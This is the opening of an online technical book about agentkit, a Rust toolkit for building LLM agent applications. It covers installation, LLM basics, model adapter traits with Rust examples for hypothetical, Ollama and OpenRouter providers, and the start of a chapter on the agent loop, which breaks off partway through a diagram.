Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Introduction

This book is a technical guide to building LLM agent applications in Rust. It uses agentkit — a modular toolkit split into small, composable crates — as both the teaching vehicle and a production-ready library you can integrate into your own projects.

It is a progressive walkthrough of the design decisions, trade-offs, and implementation patterns behind a working agent system. By the end, you should be able to:

  • Integrate agentkit into your own applications
  • Understand why each abstraction exists and what alternatives were considered
  • Build your own agent toolkit from scratch if you prefer

What agentkit is

agentkit is a Rust toolkit for building LLM agent applications: coding agents, assistant CLIs, multi-agent orchestration tools, and anything else that runs a model in a loop with tools.

The project is split into small crates behind feature flags. You pull in only what you need. The core loop is runtime-agnostic. Tool crates, MCP integration, and provider adapters add functionality at the edges.

How this book is structured

The book follows the dependency graph of a real agent system, bottom-up:

Part I: The agent loop starts with the fundamental question — what is an agent loop? — and builds up from transcript types through streaming, model adapters, the driver, and interrupt-based control flow. This is the foundation everything else rests on.

Part II: Tools and safety introduces the capability and tool abstraction layers, the permission system, built-in filesystem and shell tools, and how to write your own. Safety is a first-class concern, not an afterthought.

Part III: Context, compaction, and memory covers how agents load project context and how to manage transcript growth through compaction strategies.

Part IV: Integration and extensibility covers MCP server integration, async task management for parallel tool execution, reporting and observability, and provider adapter implementation.

Part V: Building a coding agent ties everything together by walking through the architecture of a complete coding agent — the kind of tool you use every day when you use Claude Code or Codex CLI.

Who this is for

This book assumes you are comfortable with Rust and have a working understanding of async programming. You do not need prior experience with LLM APIs, but familiarity with the basic concept of chat completions (system/user/assistant messages, tool calling) will help.

If you are evaluating agent frameworks, this book will give you enough depth to make an informed decision. If you are building your own agent system, it covers the design constraints you are likely to encounter.

Installation

Requirements

  • Rust 1.88 or later

Adding agentkit to your project

cargo add agentkit

Or add it to your Cargo.toml:

[dependencies]
agentkit = "0.2.2"

Minimal dependency set

By default, agentkit enables: core, capabilities, tools, task-manager, loop, and reporting.

To keep your build lean, disable defaults and pick only what you need:

[dependencies]
agentkit = { version = "0.2.2", default-features = false, features = ["core", "loop"] }

See the Feature flags reference for the full list.

Building from source

git clone https://github.com/danielkov/agentkit.git
cd agentkit
cargo build

Running the examples

The examples use OpenRouter as the model provider. Create a .env file in the repo root:

OPENROUTER_API_KEY=your_key_here
OPENROUTER_MODEL=openrouter/hunter-alpha

Then run any example:

cargo run -p openrouter-chat -- "hello"

The examples are referenced throughout this book. Each chapter points to the relevant example that exercises the concepts being discussed.

How do LLMs even work?

Large Language Models (LLMs) are probabilistic models, typically based on the transformer architecture, trained via gradient-based machine learning to predict the next token in a sequence.

They don’t “think” or maintain persistent memory. During inference, a pre-trained model processes an input sequence and generates output token-by-token. LLMs are stateless across requests, but fully condition on all tokens within the current context window.

Key parameters and concepts:

  • context window size: the maximum number of tokens (input + output) the model can process in a single request. Frontier models can reach ~1M tokens; ~100k–250k is typical for strong models.
  • temperature: controls randomness in token sampling. Lower values bias toward high-probability tokens (more deterministic); higher values increase diversity by allowing lower-probability tokens to be selected.
  • weights and fine-tuning: the model consists of learned parameters (“weights”) arranged in matrices across layers. These encode statistical relationships between tokens. Fine-tuning adjusts these weights to specialise behaviour on specific data or tasks.

Tokenisation

LLMs operate on tokens, not raw text. Tokens are subword units (e.g. “un”, “likely”, “##hood”).

raw text:      "unlikely"
                   │
            ┌──────┴─────┐
tokens:    [un]  [like] [ly]
            │      │      │
token ids: [348] [2193] [306]

Implications:

  • cost scales with token count, not characters
  • prompt design must consider token efficiency
  • edge cases (code, JSON, whitespace) matter

Next-token prediction

At its core, an LLM repeatedly does:

  1. Encode input tokens into vectors (embeddings)
  2. Pass them through transformer layers (attention + MLPs)
  3. Produce logits (unnormalised probabilities over vocabulary)
  4. Sample/select the next token
  5. Append token and repeat
input: [The] [cat] [sat]
         │     │     │
         ▼     ▼     ▼
┌────────────────────────┐
│      Embedding         │  map token ids → dense vectors
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│  Transformer Layer ×N  │  self-attention + feed-forward
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│   Logits (vocab size)  │  unnormalised scores over all tokens
└───────────┬────────────┘
            ▼
┌────────────────────────┐
│  Sampling / Argmax     │  pick next token
└───────────┬────────────┘
            ▼
           [on]  ← append to sequence, repeat

This loop continues until a stop condition is reached.


Attention (the core primitive)

Transformers rely on self-attention:

  • Every token attends to every other token in the sequence
  • Attention weights determine relevance between tokens
Sequence: [The] [cat] [sat] [on] [the] [___]

Attention from [___] to all previous tokens:

[The]  ░░░░░░░░░░░░░░░░░░             low
[cat]  ████████████████████████████   high  ← subject
[sat]  ██████████████████████         med   ← verb
[on]   ████████████████████████████   high  ← preposition
[the]  ███████████████                med   ← article
                                      ────────────►
                                       attention weight

Intuition: Instead of fixed rules, the model dynamically decides:

“Which previous tokens matter for predicting the next one?”

This is why LLMs can:

  • track long dependencies
  • follow instructions
  • mimic structure (e.g. code, JSON)

Sampling controls (beyond temperature)

Temperature is only one lever. Others include:

  • top-k: restrict sampling to the k most likely tokens
  • top-p (nucleus sampling): restrict to smallest set of tokens whose cumulative probability ≥ p
  • frequency / presence penalties: discourage repetition

These directly affect:

  • determinism
  • verbosity
  • hallucination rate
Logits after softmax (probability distribution over vocab):

token   prob     temperature=0.2         temperature=1.0
─────   ─────    ──────────────────      ──────────────────
"mat"   0.45     █████████████████       █████████
"rug"   0.25     ████████░░░░░░░░░       █████
"bed"   0.15     ████░░░░░░░░░░░░░       ███
"hat"   0.10     ██░░░░░░░░░░░░░░░       ██
"sky"   0.05     ░░░░░░░░░░░░░░░░░       █
                 ▲ concentrated          ▲ spread out
                 (nearly deterministic) (more creative)

With top-k=3:    only [mat, rug, bed] are candidates
With top-p=0.85: only [mat, rug, bed] (cumulative 0.85)

Why hallucinations happen

LLMs optimise for:

“What token is statistically likely next?”

—not:

“What is true?”

So they will:

  • confidently generate plausible but incorrect information
  • fill gaps when context is missing
  • prefer fluency over factuality

Mitigations:

  • better prompting
  • retrieval (RAG)
  • constrained decoding
  • fine-tuning

Fine-tuning vs prompting vs RAG

Three different levers:

  • prompting: steer behaviour at runtime (cheap, flexible)
  • fine-tuning: modify weights (expensive, persistent)
  • RAG (retrieval-augmented generation): inject external knowledge at inference

Rule of thumb:

  • behaviour → prompt
  • knowledge → RAG
  • style/consistency → fine-tune

Harnesses

To practically interface with LLMs, we build applications around them, called harnesses. A harness contains the LLM’s probabilistic behaviour, enhances it and steers it towards deterministic outcomes.

A good harness has:

  • a loop to feed a continuous conversation into the model
  • configuration options or an interface, for customizing model behaviour
  • observability, to allow users to adjust their inputs based on how the model responds
  • a toolset, to allow the model to perform tasks
┌─────────────────────────────────────────────────┐
│                   Harness                       │
│                                                 │
│   ┌───────────┐    ┌───────────┐    ┌─────────┐ │
│   │  Config   │    │    LLM    │    │  Tools  │ │
│   │ (prompts, │───▶│  (infer)  │───▶│ (act on │ │
│   │  params)  │    │           │    │  world) │ │
│   └───────────┘    └─────┬─────┘    └────┬────┘ │
│                          │               │      │
│                    ┌─────▼───────────────▼───┐  │
│                    │     Conversation loop   │  │
│                    │  (accumulate + re-send) │  │
│                    └────────────┬────────────┘  │
│                                 │               │
│                    ┌────────────▼────────────┐  │
│                    │     Observability       │  │
│                    │  (logs, metrics, traces)│  │
│                    └─────────────────────────┘  │
└─────────────────────────────────────────────────┘

The diagram above describes a chatbot harness — user input in, text out. An agent harness adds a feedback path: when the model’s output contains tool calls, the harness executes them and appends the results to the conversation before the next inference call.

This feedback path makes the harness a loop. The loop introduces several concerns that a single-turn harness does not have:

  • streaming: tokens arrive incrementally, but tool calls must be fully assembled before execution
  • interrupts: users need to be able to abort a loop heading in the wrong direction, and external systems may need to preempt it with urgent events — the loop must support pause, yield, and resume
  • context growth: each tool call and result adds tokens to the transcript, which will eventually exceed the context window
  • concurrency: independent tool calls benefit from parallel execution, but the model needs all results before it can continue
  • safety: the model can request arbitrary actions — the harness must decide which ones to permit
Chat harness (open loop):

  User ──▶ Model ──▶ Text ──▶ User


Agent harness (closed loop):

  User ──▶ Model ──┬──▶ Text ──▶ User
                   │
                   ├──▶ Tool call
                   │       │
                   │    Execute
                   │       │
                   │    Result
                   │       │
                   └───────┘  ← feed back, model continues

From harness to toolkit

A minimal agent loop is straightforward to implement. Handling all of the above — and composing cleanly into different host applications (a CLI, a web server, a multi-agent system) — requires deliberate decomposition.

agentkit splits the agent harness into independent crates, each responsible for one concern:

Concernagentkit crate
Transcript data modelagentkit-core
Agent loop and driveragentkit-loop
Tool abstractionagentkit-tools-core
Filesystem and shell toolsagentkit-tool-fs, agentkit-tool-shell
Permission systemagentkit-capabilities
Context loadingagentkit-context
Transcript compactionagentkit-compaction
MCP integrationagentkit-mcp
Task managementagentkit-task-manager
Observabilityagentkit-reporting
Provider adaptersagentkit-provider-*

Each crate can be used independently. The core loop is agnostic to the model provider, tool set, and presentation layer. The rest of this book builds up each piece, starting from the loop itself.

Chapter 2: What is an agent loop? →

Talking to models

Chapter 0 covered how LLMs work internally — tokenisation, attention, sampling. This chapter covers the practical question: how does your code send a transcript to a model and get a response back?

The answer depends on where the model runs and how the provider exposes it. agentkit abstracts over these differences with three traits: ModelAdapter, ModelSession, and ModelTurn. This chapter introduces the traits, builds an adapter from scratch for a hypothetical non-standard API, then shows how agentkit-adapter-completions handles the common case for OpenAI-compatible providers.

Transport: local vs remote

Model providers fall into two categories:

LocalRemote
Where it runsOn your machineOn provider infra
TransportHTTP to localhostHTTP to provider API
AuthNone requiredAPI key / OAuth
Resource mgmtYou manage GPU/CPUProvider manages scaling
ExamplesOllama, llama.cpp, vLLM, LocalAIOpenRouter, Anthropic, OpenAI

Both categories use HTTP and the OpenAI-compatible chat completions format (or close variants of it). The differences are in authentication, endpoint URLs, and which features are supported (streaming, tool calling, multimodal inputs).

From an adapter’s perspective, the transport is the same — an HTTP POST with a JSON body. What varies is:

  • authentication: local servers typically need none; remote providers require API keys or headers
  • request schema: most providers follow the OpenAI chat completions shape, with provider-specific extensions
  • response shape: the same choices and message structure, with varying support for tool calls, usage reporting, and reasoning output
  • streaming: some providers return a single JSON response; others stream server-sent events (SSE)

The chat completions format

Most providers (including Ollama, OpenRouter, OpenAI, and many others) speak the same wire format: the OpenAI chat completions API. Understanding this format is essential for adapter work, because the adapter’s job is to translate between it and agentkit’s transcript model.

Request

A chat completion request is a JSON POST body with three key fields:

{
  "model": "llama3.1:8b",
  "messages": [
    { "role": "system", "content": "You are a helpful assistant." },
    { "role": "user", "content": "What is 2 + 2?" }
  ],
  "stream": false
}

The messages array is the transcript. Each message has a role and content. The roles map to agentkit’s ItemKind:

Chat completions roleagentkit ItemKind
systemSystem, Developer, Context
userUser
assistantAssistant
toolTool

When tools are available, the request includes a tools array describing each tool’s name, description, and JSON Schema for its parameters:

{
  "model": "llama3.1:8b",
  "messages": [ ... ],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "read_file",
        "description": "Read a file from disk",
        "parameters": {
          "type": "object",
          "properties": {
            "path": { "type": "string" }
          },
          "required": ["path"]
        }
      }
    }
  ]
}

Optional fields include temperature, max_completion_tokens, top_p, and provider-specific extensions.

Response (non-streaming)

The response wraps the model’s output in a choices array:

{
  "id": "chatcmpl-abc123",
  "choices": [
    {
      "index": 0,
      "message": {
        "role": "assistant",
        "content": "2 + 2 = 4."
      },
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 25,
    "completion_tokens": 8,
    "total_tokens": 33
  }
}

finish_reason tells you why the model stopped:

finish_reasonMeaningagentkit FinishReason
stopModel finished normallyCompleted
tool_callsModel wants to call toolsToolCall
lengthHit token limitMaxTokens
content_filterBlocked by safety filterBlocked

When the model calls tools, the message includes a tool_calls array instead of (or alongside) content:

{
  "choices": [
    {
      "message": {
        "role": "assistant",
        "content": null,
        "tool_calls": [
          {
            "id": "call_abc123",
            "type": "function",
            "function": {
              "name": "read_file",
              "arguments": "{\"path\": \"src/main.rs\"}"
            }
          }
        ]
      },
      "finish_reason": "tool_calls"
    }
  ]
}

Note that arguments is a JSON string, not a JSON object — it needs an extra parse step.

To send tool results back, you append messages with role: "tool":

{
  "role": "tool",
  "tool_call_id": "call_abc123",
  "content": "fn main() { ... }"
}

Streaming (SSE)

When "stream": true, the response is a series of server-sent events. Each event carries a delta (partial content) instead of a complete message:

data: {"choices":[{"delta":{"role":"assistant","content":"2"},"index":0}]}

data: {"choices":[{"delta":{"content":" +"},"index":0}]}

data: {"choices":[{"delta":{"content":" 2"},"index":0}]}

data: {"choices":[{"delta":{"content":" = 4."},"index":0,"finish_reason":"stop"}]}

data: [DONE]

The consumer reassembles the full message by concatenating delta.content chunks. Tool call arguments also stream incrementally. This is where agentkit’s Delta type comes in — it provides a structured representation of these incremental updates. Streaming is covered in detail in a later chapter.

What an adapter does with this

An adapter’s job is two translations:

agentkit → provider (request):
  Vec<Item>                         ──▶ messages[]
  Vec<ToolSpec>                     ──▶ tools[]
  SessionConfig / TurnRequest.cache ──▶ auth headers, model field, cache controls

provider → agentkit (response):
  choices[0].message            ──▶ Item { kind: Assistant, parts: [...] }
  choices[0].message.tool_calls ──▶ ToolCallPart per call
  usage                         ──▶ Usage { tokens: TokenUsage { ... } }
  finish_reason                 ──▶ FinishReason

The rest of this chapter shows how these translations map to agentkit’s adapter traits.

The adapter traits

agentkit defines three traits that model the lifecycle of talking to a provider:

ModelAdapter          ModelSession      ModelTurn
────────────          ────────────      ─────────
start_session() ──▶   begin_turn() ──▶  next_event() ──▶ ModelTurnEvent
                      begin_turn() ──▶  next_event() ──▶ ModelTurnEvent
                      begin_turn() ──▶  ...
                                        next_event() ──▶ None (exhausted)
  • ModelAdapter — a factory. It holds configuration (API keys, model name, HTTP client) and produces sessions. It is Send + Sync so it can be shared across threads.
  • ModelSession — a connection-scoped handle. Created once per agent session, it may hold state that persists across turns (e.g. a conversation ID for stateful APIs). Each call to begin_turn() sends the full transcript to the provider and returns a turn.
  • ModelTurn — a streaming response handle. The loop calls next_event() repeatedly until it returns None or a Finished event. For non-streaming providers, all events can be buffered upfront and drained from a queue.

The trait signatures:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ModelAdapter: Send + Sync {
    type Session: ModelSession;
    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError>;
}

#[async_trait]
pub trait ModelSession: Send {
    type Turn: ModelTurn;
    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Self::Turn, LoopError>;
}

#[async_trait]
pub trait ModelTurn: Send {
    async fn next_event(
        &mut self,
        cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError>;
}
}

TurnRequest carries everything the provider needs:

#![allow(unused)]
fn main() {
pub struct TurnRequest {
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub transcript: Vec<Item>,
    pub available_tools: Vec<ToolSpec>,
    pub metadata: MetadataMap,
    pub cache: Option<PromptCacheRequest>,
}
}

ModelTurnEvent is what comes back:

#![allow(unused)]
fn main() {
pub enum ModelTurnEvent {
    Delta(Delta),
    ToolCall(ToolCallPart),
    Usage(Usage),
    Finished(ModelTurnResult),
}
}

Building an adapter from scratch

To see what the traits require, consider a hypothetical model provider that does not use the OpenAI format. Suppose “AcmeAI” has a proprietary REST API:

POST https://api.acme.ai/v1/generate
Authorization: Bearer <token>

{
  "prompt": "What is 2 + 2?",
  "system_instruction": "You are a helpful assistant.",
  "config": { "temperature": 0.5, "max_tokens": 256 }
}

Response:
{
  "text": "2 + 2 = 4.",
  "tokens_used": { "input": 25, "output": 8 },
  "stop_reason": "complete"
}

No messages array. No choices wrapper. No tool_calls. A completely different shape. The adapter must translate to and from it.

Adapter and session

#![allow(unused)]
fn main() {
pub struct AcmeAdapter {
    client: Client,
    api_key: String,
}

pub struct AcmeSession {
    client: Client,
    api_key: String,
}

#[async_trait]
impl ModelAdapter for AcmeAdapter {
    type Session = AcmeSession;

    async fn start_session(&self, _config: SessionConfig) -> Result<AcmeSession, LoopError> {
        Ok(AcmeSession {
            client: self.client.clone(),
            api_key: self.api_key.clone(),
        })
    }
}
}

Turn: the translation layer

begin_turn does the work. It must convert agentkit’s transcript into Acme’s request format and convert the response back into ModelTurnEvents:

#![allow(unused)]
fn main() {
#[async_trait]
impl ModelSession for AcmeSession {
    type Turn = AcmeTurn;

    async fn begin_turn(
        &mut self,
        request: TurnRequest,
        _cancellation: Option<TurnCancellation>,
    ) -> Result<AcmeTurn, LoopError> {
        // Extract the last user message as the prompt.
        // Acme doesn't support multi-turn — flatten the transcript.
        let prompt = request.transcript.iter()
            .rev()
            .find(|item| item.kind == ItemKind::User)
            .and_then(|item| item.parts.first())
            .and_then(|part| match part {
                Part::Text(t) => Some(t.text.clone()),
                _ => None,
            })
            .unwrap_or_default();

        let system = request.transcript.iter()
            .find(|item| item.kind == ItemKind::System)
            .and_then(|item| item.parts.first())
            .and_then(|part| match part {
                Part::Text(t) => Some(t.text.clone()),
                _ => None,
            });

        let body = json!({
            "prompt": prompt,
            "system_instruction": system,
            "config": { "temperature": 0.5, "max_tokens": 256 },
        });

        let resp: AcmeResponse = self.client
            .post("https://api.acme.ai/v1/generate")
            .bearer_auth(&self.api_key)
            .json(&body)
            .send().await
            .map_err(|e| LoopError::Provider(e.to_string()))?
            .json().await
            .map_err(|e| LoopError::Provider(e.to_string()))?;

        // Convert Acme's response into ModelTurnEvents
        let mut events = VecDeque::new();

        events.push_back(ModelTurnEvent::Usage(Usage {
            tokens: Some(TokenUsage {
                input_tokens: resp.tokens_used.input,
                output_tokens: resp.tokens_used.output,
                reasoning_tokens: None,
                cached_input_tokens: None,
            }),
            cost: None,
            metadata: MetadataMap::new(),
        }));

        let output_item = Item {
            id: None,
            kind: ItemKind::Assistant,
            parts: vec![Part::Text(TextPart {
                text: resp.text,
                metadata: MetadataMap::new(),
            })],
            metadata: MetadataMap::new(),
        };

        let finish_reason = match resp.stop_reason.as_str() {
            "complete" => FinishReason::Completed,
            "max_tokens" => FinishReason::MaxTokens,
            other => FinishReason::Other(other.into()),
        };

        events.push_back(ModelTurnEvent::Finished(ModelTurnResult {
            finish_reason,
            output_items: vec![output_item],
            usage: None,
            metadata: MetadataMap::new(),
        }));

        Ok(AcmeTurn { events })
    }
}
}

The turn drain

The turn itself is the same VecDeque pattern used by every non-streaming adapter:

#![allow(unused)]
fn main() {
pub struct AcmeTurn {
    events: VecDeque<ModelTurnEvent>,
}

#[async_trait]
impl ModelTurn for AcmeTurn {
    async fn next_event(
        &mut self,
        _cancellation: Option<TurnCancellation>,
    ) -> Result<Option<ModelTurnEvent>, LoopError> {
        Ok(self.events.pop_front())
    }
}
}

This adapter is complete. It can be passed to Agent::builder().model(adapter) and the loop will call it. The model doesn’t support tool calls, so the loop will always finish after a single turn — but that’s a limitation of Acme’s API, not of the adapter.

The key takeaway: you can integrate any model provider by implementing the three traits. The translation is manual — you map the provider’s request/response format to agentkit’s Item/Part/Usage/FinishReason types. There is no requirement that the provider speaks OpenAI’s format.

The completions adapter

Most providers do speak the OpenAI chat completions format. Implementing the full translation for each one — transcript conversion, multimodal content encoding, tool call parsing, cancellation, error handling — is repetitive. The agentkit-adapter-completions crate handles all of it once.

Instead of implementing ModelAdapter / ModelSession / ModelTurn directly, a provider implements CompletionsProvider:

#![allow(unused)]
fn main() {
pub trait CompletionsProvider: Send + Sync + Clone {
    /// Strongly-typed request config (model, temperature, etc.).
    /// Serialised and merged into the request body.
    type Config: Serialize + Clone + Send + Sync;

    fn provider_name(&self) -> &str;
    fn endpoint_url(&self) -> &str;
    fn config(&self) -> &Self::Config;

    // Hooks — defaults pass through unchanged:
    fn preprocess_request(&self, builder: reqwest::RequestBuilder) -> reqwest::RequestBuilder { builder }
    fn preprocess_response(&self, _status: StatusCode, _body: &str) -> Result<(), LoopError> { Ok(()) }
    fn postprocess_response(&self, _usage: &mut Option<Usage>, _metadata: &mut MetadataMap, _raw: &Value) {}
}
}

The generic CompletionsAdapter<P> implements ModelAdapter and handles:

  • Converting Vec<Item> to the messages array (all ItemKind and Part variants)
  • Serialising P::Config and merging it into the request body
  • Converting Vec<ToolSpec> to the tools array
  • Parsing the response into ModelTurnEvents (text, tool calls, reasoning, usage, finish reason)
  • Encoding multimodal content (images as image_url, audio as input_audio)
  • Racing the HTTP future against the cancellation handle
┌────────────────────────────────────────────────────────────┐
│  CompletionsAdapter<P>                                     │
│                                                            │
│  ┌────────────────────────┐  ┌──────────────────────────┐  │
│  │ P: CompletionsProvider │  │ request.rs / response.rs │  │
│  │ (endpoint, config,     │  │ (transcript conversion,  │  │
│  │  pre/post hooks)       │  │  response parsing)       │  │
│  └────────────────────────┘  └──────────────────────────┘  │
│                                                            │
│  Implements ModelAdapter ──▶ ModelSession ──▶ ModelTurn    │
└────────────────────────────────────────────────────────────┘

The Config associated type is generic because request parameters differ across providers — and sometimes across models within the same provider. Ollama uses num_predict where OpenAI uses max_completion_tokens. Mistral uses max_tokens. Some providers support top_k, others don’t. Making this a provider-defined Serialize struct means each provider declares exactly the parameters it supports, with their correct field names, and gets compile-time validation and IDE completion. The adapter serialises the struct and merges it into the request body:

#![allow(unused)]
fn main() {
// In the adapter's request builder:
let config_value = serde_json::to_value(provider.config())?;
if let Value::Object(fields) = config_value {
    for (key, value) in fields {
        body.insert(key, value);
    }
}
}

This means Ollama can use num_predict where OpenAI uses max_completion_tokens, Mistral can use max_tokens, and each provider gets IDE completion and compile-time validation for its supported parameters.

Building an Ollama provider

Ollama exposes an OpenAI-compatible endpoint at http://localhost:11434/v1/chat/completions. Using agentkit-adapter-completions, the entire provider is a config struct, a request config struct, and a CompletionsProvider impl.

Configuration

The user-facing config holds connection and inference parameters:

#![allow(unused)]
fn main() {
pub struct OllamaConfig {
    pub model: String,
    pub base_url: String,
    pub temperature: Option<f32>,
    pub num_predict: Option<u32>,
    pub top_k: Option<u32>,
    pub top_p: Option<f32>,
}

impl OllamaConfig {
    pub fn new(model: impl Into<String>) -> Self {
        Self {
            model: model.into(),
            base_url: "http://localhost:11434/v1/chat/completions".into(),
            temperature: None,
            num_predict: None,
            top_k: None,
            top_p: None,
        }
    }

    pub fn with_temperature(mut self, v: f32) -> Self {
        self.temperature = Some(v);
        self
    }

    pub fn with_num_predict(mut self, v: u32) -> Self {
        self.num_predict = Some(v);
        self
    }
    // ...
}
}

Request config

The request config is what gets serialised into the JSON body. It uses #[serde(skip_serializing_if)] so unset parameters are omitted, not sent as null:

#![allow(unused)]
fn main() {
#[derive(Clone, Serialize)]
pub struct OllamaRequestConfig {
    pub model: String,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub temperature: Option<f32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub num_predict: Option<u32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub top_k: Option<u32>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub top_p: Option<f32>,
}
}

Provider implementation

The provider struct holds connection details and the request config. The CompletionsProvider impl is minimal — Ollama has no auth and no protocol quirks:

#![allow(unused)]
fn main() {
#[derive(Clone)]
pub struct OllamaProvider {
    base_url: String,
    request_config: OllamaRequestConfig,
}

impl CompletionsProvider for OllamaProvider {
    type Config = OllamaRequestConfig;

    fn provider_name(&self) -> &str { "Ollama" }
    fn endpoint_url(&self) -> &str { &self.base_url }
    fn config(&self) -> &OllamaRequestConfig { &self.request_config }
}
}

No hooks overridden. Ollama needs no auth, has no response quirks, and reports no provider-specific fields. The defaults pass everything through unchanged.

The adapter newtype

The adapter is a newtype over CompletionsAdapter<OllamaProvider>, delegating to it for the ModelAdapter impl:

#![allow(unused)]
fn main() {
#[derive(Clone)]
pub struct OllamaAdapter(CompletionsAdapter<OllamaProvider>);

impl OllamaAdapter {
    pub fn new(config: OllamaConfig) -> Result<Self, OllamaError> {
        let provider = OllamaProvider::from(config);
        Ok(Self(CompletionsAdapter::new(provider)?))
    }
}

#[async_trait]
impl ModelAdapter for OllamaAdapter {
    type Session = CompletionsSession<OllamaProvider>;

    async fn start_session(&self, config: SessionConfig) -> Result<Self::Session, LoopError> {
        self.0.start_session(config).await
    }
}
}

This is the complete provider. All of the transcript conversion, tool call serialisation, response parsing, multimodal encoding, and cancellation handling comes from agentkit-adapter-completions.

Contrast: what the adapter handles vs what the provider handles

agentkit-adapter-completionsagentkit-provider-ollama
Vec<Item>messages[]endpoint URL
Vec<ToolSpec>tools[]request config (model, temperature, …)
Config → request body fieldspreprocess_request (none needed)
response → ModelTurnEventpreprocess_response (none needed)
multimodal content encodingpostprocess_response (none needed)
cancellation
error status codes
tool call parsing
usage mapping
finish reason mapping

Providers with quirks

Not all OpenAI-compatible providers are identical. The three hooks exist for providers that need to customise the standard request/response flow.

OpenRouter uses all three:

  1. preprocess_request — adds bearer auth, X-Title, and HTTP-Referer headers
  2. preprocess_response — the API sometimes returns HTTP 200 with an error payload instead of a proper error status; the hook parses these and converts them to errors before the adapter attempts normal deserialization
  3. postprocess_response — extracts the cost field from the usage object (OpenRouter-specific, not part of the standard format) and adds openrouter.model and openrouter.refusal to the item metadata
#![allow(unused)]
fn main() {
impl CompletionsProvider for OpenRouterProvider {
    type Config = OpenRouterRequestConfig;

    fn provider_name(&self) -> &str { "OpenRouter" }
    fn endpoint_url(&self) -> &str { &self.base_url }
    fn config(&self) -> &OpenRouterRequestConfig { &self.request_config }

    fn preprocess_request(
        &self,
        builder: reqwest::RequestBuilder,
    ) -> reqwest::RequestBuilder {
        let mut builder = builder.bearer_auth(&self.api_key);
        if let Some(app_name) = &self.app_name {
            builder = builder.header("X-Title", app_name);
        }
        if let Some(site_url) = &self.site_url {
            builder = builder.header("HTTP-Referer", site_url);
        }
        builder
    }

    fn preprocess_response(
        &self,
        _status: StatusCode,
        body: &str,
    ) -> Result<(), LoopError> {
        if let Ok(e) = serde_json::from_str::<ErrorResponse>(body) {
            return Err(LoopError::Provider(format!(
                "OpenRouter returned error (code {}): {}",
                e.error.code, e.error.message
            )));
        }
        Ok(())
    }

    fn postprocess_response(
        &self,
        usage: &mut Option<Usage>,
        metadata: &mut MetadataMap,
        raw_response: &Value,
    ) {
        if let Some(cost) = raw_response.pointer("/usage/cost").and_then(Value::as_f64) {
            if let Some(usage) = usage {
                usage.cost = Some(CostUsage {
                    amount: cost,
                    currency: "USD".into(),
                    provider_amount: None,
                });
            }
        }
        if let Some(model) = raw_response.get("model").and_then(Value::as_str) {
            metadata.insert("openrouter.model".into(), Value::String(model.into()));
        }
        if let Some(refusal) = raw_response
            .pointer("/choices/0/message/refusal")
            .and_then(Value::as_str)
        {
            metadata.insert("openrouter.refusal".into(), Value::String(refusal.into()));
        }
    }
}
}

Using it:

#![allow(unused)]
fn main() {
let adapter = OpenRouterAdapter::new(
    OpenRouterConfig::new("sk-or-v1-...", "anthropic/claude-sonnet-4")
        .with_temperature(0.0)
        .with_max_completion_tokens(4096)
        .with_app_name("my-agent"),
)?;

let agent = Agent::builder()
    .model(adapter)
    .build()?;
}

Without tools or a loop, an agent can be used for a single one-shot inference call — send a message, get a response:

#![allow(unused)]
fn main() {
let mut driver = agent
    .start(SessionConfig {
        session_id: SessionId::new("one-shot"),
        metadata: MetadataMap::new(),
        cache: Some(PromptCacheRequest {
            mode: PromptCacheMode::BestEffort,
            strategy: PromptCacheStrategy::Automatic,
            retention: Some(PromptCacheRetention::Short),
            key: None,
        }),
    })
    .await?;

driver.submit_input(vec![Item {
    id: None,
    kind: ItemKind::User,
    parts: vec![Part::Text(TextPart {
        text: "Explain quicksort in one sentence.".into(),
        metadata: MetadataMap::new(),
    })],
    metadata: MetadataMap::new(),
}])?;

if let LoopStep::Finished(result) = driver.next().await? {
    for item in result.items {
        for part in &item.parts {
            if let Part::Text(text) = part {
                println!("{}", text.text);
            }
        }
    }
}
}

The cache field is the session-level prompt caching policy — request-level configuration, not transcript data. See Chapter 15: Prompt caching for the full cache request shape, provider mapping, and per-turn overrides.

No tools are registered, so the model returns text and the driver finishes after a single turn. This is the simplest way to use agentkit — a typed HTTP client for chat completions with provider abstraction. The agent loop, covered in the next chapter, adds tool execution and iteration on top.

Available providers

agentkit ships the following provider crates, all built on agentkit-adapter-completions:

CrateProviderAuthDefault endpoint
agentkit-provider-openrouterOpenRouterBearer + custom headersopenrouter.ai/api/v1/chat/completions
agentkit-provider-openaiOpenAIBearerapi.openai.com/v1/chat/completions
agentkit-provider-ollamaOllamanonelocalhost:11434/v1/chat/completions
agentkit-provider-vllmvLLMoptional Bearerlocalhost:8000/v1/chat/completions
agentkit-provider-groqGroqBearerapi.groq.com/openai/v1/chat/completions
agentkit-provider-mistralMistralBearerapi.mistral.ai/v1/chat/completions

Each follows the same pattern: a config struct with new() fluent builders (and an optional from_env() helper), a Serialize request config, and a CompletionsProvider impl. Provider-specific parameters are strongly typed — Ollama has num_predict and top_k, Mistral uses max_tokens instead of max_completion_tokens, OpenAI has frequency_penalty and presence_penalty.

For providers not listed here, you can either:

  1. Implement CompletionsProvider if the provider speaks the OpenAI chat completions format (~50 lines)
  2. Implement ModelAdapter / ModelSession / ModelTurn directly if the provider has a non-standard API (as shown in the AcmeAI example)

Chapter 2: What is an agent loop? →

What is an agent loop?

A chat completion takes a transcript and returns a response. An agent loop extends this by inspecting the response for tool calls, executing them, appending the results to the transcript, and sending the updated transcript back to the model. This repeats until the model produces a response with no tool calls, or until the host intervenes.

This chapter defines the structure of that loop and maps it to agentkit’s core types.

The basic loop

An agent loop repeats five steps:

  1. Send the current transcript to the model
  2. Receive the model’s response (which may contain text, tool calls, or both)
  3. If the response contains tool calls, execute them
  4. Append the tool results to the transcript
  5. Go to 1
┌───────────────────────────────────────────┐
│              Host application             │
│                                           │
│   submit user input                       │
│        │                                  │
│        ▼                                  │
